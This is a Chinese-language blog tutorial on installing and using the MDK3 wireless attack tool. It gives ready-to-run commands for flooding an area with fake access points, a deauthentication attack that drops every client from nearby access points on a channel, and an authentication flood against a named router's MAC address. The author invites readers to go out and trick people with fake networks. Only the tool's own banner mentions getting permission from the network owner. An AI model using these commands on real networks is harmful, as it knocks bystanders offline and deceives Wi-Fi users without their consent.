文章出處

  MDK3是?

  MDK3 是一款無線DOS 攻擊測試工具,能夠發起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻擊,另外它還具有針對隱藏ESSID 的暴力探測模式、802.1X 滲透測試等功能

  安裝MDK3

  打開文件 /etc/apt/sources.list ,添加kali源:

sudo gedit /etc/apt/sources.list

  ubuntu系統安裝MDK3需要kali的源, 我們在文件末尾添加 源:

deb http://mirrors.aliyun.com/kali sana main non-free contrib  
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free  
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free  

 

  再執行命令安裝:

sudo apt-get install mdk3

   如果mdk3創建成功了, 在命令行輸入 sudo mdk3 ,會出現一下提示:

MDK 3.0 v6 - "Yeah, well, whatever"
by ASPj of k2wrlz, using the osdep library from aircrack-ng
And with lots of help from the great aircrack-ng community:
Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
THANK YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
IMPORTANT: It is your responsibility to make sure you have permission from the
network owner before running MDK against it.

This code is licenced under the GPLv2

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options
Try mdk3 --help <test_mode> for info about one test only

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.

 

 

  使用MDK3創建偽熱點AP

  把網卡 wlx001d0f04f093 設定為混雜模式, 網卡名字是參考ifconfig, 因為沒一臺計算機網卡都不同 :

sudo airmon-ng start wlx001d0f04f093

  執行這個最最要的命令, 創建一個名字為:測試模擬WIFI 的 熱點:

sudo mdk3 mon0 b -n 測試WIFI -t -c 6 -s 80

 

 

  創建一堆偽熱點AP, 首先需要一個文件, 文件里面保存了所有的WIIF名, 比如文件名為wifis.txt , 內容為:

白日依山盡
黃河入海流
欲窮千里目
更上一層樓

 

  如果前面已經執行 sudo airmon-ng start wlx001d0f04f093 ,那就不要再執行,否者務必重新執行一遍 ,然后構造mdk3的命令:

 sudo mdk3 mon0 b -f ./wifis.txt -t -c 6 

  然后就可以出去惡搞啦, 弄一堆WIFI騙人, 雖然這個沒啥用處 >.<

  攻擊WIIF熱點, 解除驗證攻擊

  Deauthentication/Disassociation Amok 解除驗證攻擊, 在這個模式下,軟件會向周圍所有可見AP發起循環攻擊......可以造成一定范圍內的無線網絡癱瘓

  首先通過sudo airodump-ng mon0獲取要攻擊的信道:

sudo airodump-ng mon0

  如果要攻擊信道為11的路由, 構造的命令如下:

sudo mdk3 mon0 d -c 11  

  解除驗證攻擊也可以設置白名單和黑名單, 讓指定的AP不受該攻擊的影響, 具體可以參考幫助文檔:

sudo mdk3 --help d

   Authentication DoS

  Authentication DoS,這是一種驗證請求攻擊模式:在這個模式里,軟件自動模擬隨機產生的mac向目標AP發起大量驗證請求,可以導致AP忙于處理過多的請求而停止對正常連接客戶端的響應, 如果路由不死的話,其實客戶上網也是非常卡的, 親身經歷..

  -a后面的參數為 目標AP的MAC地址:

sudo mdk3 mon0 a -a 5C:63:BF:C4:A4:CE

  參考

  MDK3GITHUB: https://github.com/wi-fi-analyzer/mdk3-master

  無線攻擊神器--MDK3 使用方法:http://ju.outofmemory.cn/entry/148457

 

作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 


文章列表


不含病毒。www.avast.com
arrow
arrow
    全站熱搜
    創作者介紹
    創作者 大師兄 的頭像
    大師兄

    IT工程師數位筆記本

    大師兄 發表在 痞客邦 留言(0) 人氣()